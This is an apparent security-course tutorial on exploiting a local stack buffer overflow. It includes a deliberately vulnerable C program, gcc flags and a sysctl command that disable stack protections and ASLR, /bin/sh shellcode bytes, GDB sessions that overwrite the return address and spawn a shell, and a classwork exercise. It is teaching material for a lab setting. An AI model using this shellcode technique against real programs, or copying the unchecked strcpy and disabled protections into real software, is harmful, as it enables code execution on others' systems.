Buffer Overflows

Introduction

Buffer overflow vulnerabilities used to be extremely common in software. They are now found less often in high-profile projects, though they still occur, and kernel- and compiler-level protections have made the remaining ones harder to exploit. Learning to exploit them is nevertheless a very good starting point for learning to hack.

Setup

To follow this tutorial, you need a machine that does not have stack randomization enabled. You can use the machine netsec-playground.cs.northwestern.edu, or disable stack randomization on your own machine by running the following command as root:

sysctl -w kernel.randomize_va_space=0

This makes your machine more vulnerable to attackers, but the change is not persistent: the setting returns to its default when you reboot.
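Before continuing, it can help to confirm that the setting took effect. The sketch below is not part of the original tutorial. It assumes a Linux system that exposes the setting at /proc/sys/kernel/randomize_va_space, and both function names are hypothetical.

```c
#include <stdio.h>

/* Hypothetical helper: read the integer stored in a sysctl-style file.
 * Returns -1 if the file cannot be opened or does not hold a number. */
int read_randomize_va_space(const char *path)
{
    FILE *f = fopen(path, "r");
    int value = -1;

    if (f == NULL)
        return -1;
    if (fscanf(f, "%d", &value) != 1)
        value = -1;
    fclose(f);
    return value;
}

/* Map the kernel's documented values to a short description. */
const char *describe_randomize_va_space(int value)
{
    switch (value) {
    case 0:  return "disabled";
    case 1:  return "stack, mmap base and vDSO randomized";
    case 2:  return "as 1, plus heap (brk) randomization";
    default: return "unknown";
    }
}
```

Calling read_randomize_va_space("/proc/sys/kernel/randomize_va_space") should return 0 once the sysctl command above has been run.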

Tutorial

This tutorial will walk you through a simple, local stack-based buffer overflow example. Below is a short program, vulnerable.c, that mismanages memory:

$ cat vulnerable.c 
#include <stdio.h>
#include <string.h>

void foo (char *arg) {
  char buffer[64];
  strcpy(buffer, arg);
}

int main(int argc, char *argv[]) {
  foo(argv[1]);
  return(0);
}

The program takes a single command-line argument and copies it into a 64-byte buffer with strcpy(), which does not check the argument's length. First, compile the program as shown below.

$ gcc -g -Wall -fno-stack-protector -z execstack -o vulnerable vulnerable.c

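The extra gcc flags are needed to allow stack-based exploitation on modern systems: -fno-stack-protector turns off the stack canary that would detect the overwrite, and -z execstack marks the stack as executable. The program doesn't do anything useful, but you can verify that it is in fact vulnerable with a simple command: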

$ ./vulnerable `ruby -e 'print "A"*72'`
Segmentation fault

Now run the program through GDB, and pay close attention to the return address of foo (the value listed under saved eip).

$ gdb -q vulnerable
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) break foo
Breakpoint 1 at 0x804837a: file vulnerable.c, line 6.
(gdb) run `ruby -e 'print "A"*72'` 
Starting program: /home/sam/vulnerable `ruby -e 'print "A"*72'`

Breakpoint 1, foo (arg=0xbffff912 'A' <repeats 72 times>) at vulnerable.c:6
6         strcpy(buffer, arg);
(gdb) info frame
Stack level 0, frame at 0xbffff710:
 eip = 0x804837a in foo (vulnerable.c:6); saved eip 0x80483af
 called by frame at 0xbffff720
 source language c.
 Arglist at 0xbffff708, args: arg=0xbffff912 'A' <repeats 72 times>
 Locals at 0xbffff708, Previous frame's sp is 0xbffff710
 Saved registers:
  ebp at 0xbffff708, eip at 0xbffff70c
(gdb) s
7       }
(gdb) info frame
Stack level 0, frame at 0xbffff710:
 eip = 0x804838c in foo (vulnerable.c:7); saved eip 0x41414141
 called by frame at 0xbffff714
 source language c.
 Arglist at 0xbffff708, args: arg=0xbffff900 "home/sam/vulnerable"
 Locals at 0xbffff708, Previous frame's sp is 0xbffff710
 Saved registers:
  ebp at 0xbffff708, eip at 0xbffff70c
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

The info frame command prints information about the current function's stack frame. The first call shows that eip currently points to 0x804837a (yours will likely differ) and that foo will return to 0x80483af when it exits (again, yours will differ). After stepping past the strcpy() call, info frame shows that foo will attempt to return to 0x41414141. Since 0x41 is the ASCII code for 'A', the return address has been overwritten with the input string.
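The overwrite can be reproduced offline with a small model of foo's frame. The sketch below is an illustration, not part of the original program. It assumes the common 32-bit x86 layout in which the 64-byte buffer is followed directly by the 4-byte saved ebp and the 4-byte saved eip; struct foo_frame_model and both function names are hypothetical. Your compiler may lay the frame out differently, so confirm the distances with GDB.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Assumed layout of foo's frame, lowest address first. */
struct foo_frame_model {
    unsigned char buffer[64];
    unsigned char saved_ebp[4];
    unsigned char saved_eip[4];
};

/* Decode four bytes as a little-endian 32-bit value, as x86 does. */
uint32_t read_le32(const unsigned char *p)
{
    return (uint32_t)p[0]
         | ((uint32_t)p[1] << 8)
         | ((uint32_t)p[2] << 16)
         | ((uint32_t)p[3] << 24);
}

/* Copy len input bytes over a zeroed model frame, starting at buffer,
 * the way strcpy() writes upward through the real frame. Bytes that
 * would fall past the model are dropped so the simulation itself
 * stays in bounds. Returns the resulting saved return address. */
uint32_t saved_eip_after_copy(const unsigned char *input, size_t len)
{
    struct foo_frame_model frame;

    memset(&frame, 0, sizeof frame);
    if (len > sizeof frame)
        len = sizeof frame;
    memcpy(&frame, input, len);
    return read_le32(frame.saved_eip);
}
```

With 72 'A' bytes as input, saved_eip_after_copy returns 0x41414141, the value GDB reported. Under the same assumed layout, the NUL terminator that strcpy() appends lands one byte past the saved eip, on the low byte of arg, which would explain why GDB shows arg changing from 0xbffff912 to 0xbffff900 after the copy.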

Now it's time to get a shell. To exploit this program all that is needed is some generic shellcode and the location of that shellcode in memory. Everything can be put together using some simple command-line programs.
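One constraint on the shellcode is worth checking before building the exploit string. The argument reaches buffer through the shell's command substitution and then through strcpy(), so a NUL byte cannot survive inside it (and would stop strcpy() in any case), and, assuming the shell's default IFS, a space, tab, or newline would split the argument in two. The sketch below scans a byte string for those values; the function name is hypothetical and not from the original tutorial.

```c
#include <stddef.h>

/* Return the index of the first byte that would truncate or split the
 * argument (NUL, space, tab, newline), or -1 if there is none. */
long first_unsafe_byte(const unsigned char *payload, size_t len)
{
    size_t i;

    for (i = 0; i < len; i++) {
        unsigned char b = payload[i];

        if (b == 0x00 || b == ' ' || b == '\t' || b == '\n')
            return (long)i;
    }
    return -1;
}
```

The shellcode used in this tutorial, and the return addresses appended to it, contain none of these bytes, so the function returns -1 for them.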

$ printf "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh" > shellcode.bin
$ echo `cat shellcode.bin``ruby -e 'print "return_address"*2'`
?^?1??F?F
         ?
          ???V
              ̀1ۉ?@̀?????/bin/shreturn_addressreturn_address

The basic idea is to input the shellcode followed by its location in memory. A useful trick is to repeat the address of the shellcode as many times as necessary to overwrite the function's return address. The key realization is that the shellcode's location in memory is simply buffer's location in memory. There are also a few important points to remember:

With that in mind, step through the program again in GDB.

(gdb) run `cat shellcode.bin``ruby -e 'print "\xc8\xf6\xff\xbf"*10'`

Starting program: /home/sam/vulnerable `cat shellcode.bin``ruby -e 'print "\xc8\xf6\xff\xbf"*10'`

Breakpoint 1, foo (
    arg=0xbffff906 "ë\037^\211v\b1À\210F\a\211F\f°\v\211ó\215N\b\215V\fÍ\2001Û\211Ø@Í\200èÜÿÿÿ/bin/shÈöÿ¿Èöÿ¿Èöÿ¿Èöÿ¿Èöÿ¿Èöÿ¿Èöÿ¿Èöÿ¿Èöÿ¿Èöÿ¿")
    at vulnerable.c:6
6         strcpy(buffer, arg);
(gdb) x/s buffer
0xbffff6c8:      ".N=

Breaking at foo shows that the argument does contain the shellcode (note the /bin/sh string). That's good, but what about the address of the buffer? GDB reports 0xbffff6c8, the same address used in our exploit string. Everything is in place to step through the strcpy() and see what happens.
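The address bytes in the run command above, \xc8\xf6\xff\xbf, are 0xbffff6c8 written least significant byte first, because x86 stores multi-byte values in little-endian order. As a rough sketch of how the exploit string is assembled (the function names and the buffer-size parameter are illustrative, not part of the original tutorial):

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Write a 32-bit address as four bytes, least significant first. */
void write_le32(unsigned char *out, uint32_t addr)
{
    out[0] = (unsigned char)(addr & 0xff);
    out[1] = (unsigned char)((addr >> 8) & 0xff);
    out[2] = (unsigned char)((addr >> 16) & 0xff);
    out[3] = (unsigned char)((addr >> 24) & 0xff);
}

/* Lay out [code][addr][addr]... in out.
 * Returns the number of bytes written, or 0 if out is too small. */
size_t build_exploit_string(unsigned char *out, size_t out_size,
                            const unsigned char *code, size_t code_len,
                            uint32_t addr, size_t repeats)
{
    size_t total = code_len + 4 * repeats;
    size_t i;

    if (total > out_size)
        return 0;
    memcpy(out, code, code_len);
    for (i = 0; i < repeats; i++)
        write_le32(out + code_len + 4 * i, addr);
    return total;
}
```

This mirrors what the cat and ruby command substitutions do on the command line: the shellcode bytes come first, followed by ten copies of the address.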

(gdb) s
7       }
(gdb) info frame
Stack level 0, frame at 0xbffff710:
 eip = 0x804838c in foo (vulnerable.c:7); saved eip 0xfff6c8bf
 called by frame at 0xbffff714
 source language c.
 Arglist at 0xbffff708, args: arg=0xfff6c8bf <Address 0xfff6c8bf out of bounds>
 Locals at 0xbffff708, Previous frame's sp is 0xbffff710
 Saved registers:
  ebp at 0xbffff708, eip at 0xbffff70c

What happened? The return address was definitely overwritten, and it looks vaguely similar to 0xbffff6c8, but something went wrong. The problem is that the shellcode's length, 45 bytes, isn't a multiple of four, so the repeated return address in the exploit string is no longer aligned with the saved eip slot on the stack. Padding the shellcode with three nop instructions brings it to 48 bytes and restores the alignment. A nop, short for 'no-operation', is an assembly instruction that tells the processor to do nothing for a cycle. On x86, the nop instruction is the single byte \x90. One last run through GDB is below (note that the change in input also changed the address of our buffer).
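The arithmetic behind the misalignment can be checked by hand or with a short sketch. The numbers come from the session above: the shellcode written by the printf command is 45 bytes long, and GDB shows saved eip at 0xbffff70c and buffer at 0xbffff6c8, which are 68 bytes apart. The function names below are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

/* Number of one-byte nops needed to round code_len up to a multiple
 * of word bytes. */
size_t nop_padding(size_t code_len, size_t word)
{
    return (word - code_len % word) % word;
}

/* For a string laid out as [pad nops][code][addr][addr]..., return
 * which byte of the repeated 4-byte address lands on the first byte
 * of the saved eip slot, ret_offset bytes from the start of buffer.
 * 0 means the address is aligned with the slot. */
size_t address_phase_at(size_t ret_offset, size_t pad, size_t code_len)
{
    return (ret_offset % 4 + 4 - (pad + code_len) % 4) % 4;
}

/* Value the CPU reads from the slot when the little-endian address
 * bytes arrive rotated by phase positions. */
uint32_t misaligned_return_address(uint32_t addr, size_t phase)
{
    unsigned shift = 8u * (unsigned)(phase % 4);

    if (shift == 0)
        return addr;
    return (addr >> shift) | (addr << (32u - shift));
}
```

With no padding, address_phase_at(68, 0, 45) is 3, and misaligned_return_address(0xbffff6c8, 3) gives 0xfff6c8bf, the saved eip GDB reported. nop_padding(45, 4) is 3, and with three nops the phase becomes 0, so the address lands intact.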

(gdb) run `ruby -e 'print "\x90"*3'``cat shellcode.bin``ruby -e 'print "\xb8\xf6\xff\xbf"*10'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/sam/vulnerable `ruby -e 'print "\x90"*3'``cat shellcode.bin``ruby -e 'print "\xb8\xf6\xff\xbf"*10'`

Breakpoint 1, foo (
    arg=0xbffff903 "\220\220\220ë\037^\211v\b1À\210F\a\211F\f°\v\211ó\215N\b\215V\fÍ\2001Û\211Ø@Í\200èÜÿÿÿ/bin/sh¸öÿ¿¸öÿ¿¸öÿ¿¸öÿ¿¸öÿ¿¸öÿ¿¸öÿ¿¸öÿ¿¸öÿ¿¸öÿ¿")
    at vulnerable.c:6
6         strcpy(buffer, arg);
(gdb) x/s buffer
0xbffff6b8:      ".N=
(gdb) s
7       }
(gdb) info frame
Stack level 0, frame at 0xbffff700:
 eip = 0x804838c in foo (vulnerable.c:7); saved eip 0xbffff6b8
 called by frame at 0xbffff704
 source language c.
 Arglist at 0xbffff6f8, args: 
    arg=0xbffff6b8 "\220\220\220ë\037^\211v\b1À\210F\a\211F\f°\v\211ó\215N\b\215V\fÍ\2001Û\211Ø@Í\200èÜÿÿÿ/bin/sh¸öÿ¿¸öÿ¿¸öÿ¿¸öÿ¿¸öÿ¿¸öÿ¿¸öÿ¿¸öÿ¿¸öÿ¿¸öÿ¿"
 Locals at 0xbffff6f8, Previous frame's sp is 0xbffff700
 Saved registers:
  ebp at 0xbffff6f8, eip at 0xbffff6fc

At this point, everything looks good. The exploit string uses the correct address for buffer and foo's return address has successfully been overwritten with that value. Continuing should execute a shell.

(gdb) c
Continuing.
Executing new program: /bin/dash
(no debugging symbols found)
Error in re-setting breakpoint 1: Function "foo" not defined.
(no debugging symbols found)
(no debugging symbols found)
$ echo about time                
about time
$ exit

Program exited normally.

Success! foo returned to the start of buffer, the processor ran through the nops into the shellcode, and the shellcode spawned a shell. Exiting the shell lets the debugged process exit normally.

Classwork

Get this same exploit to work outside of GDB. You can edit the source code to add something like a printf, but be aware that it is possible without touching the source.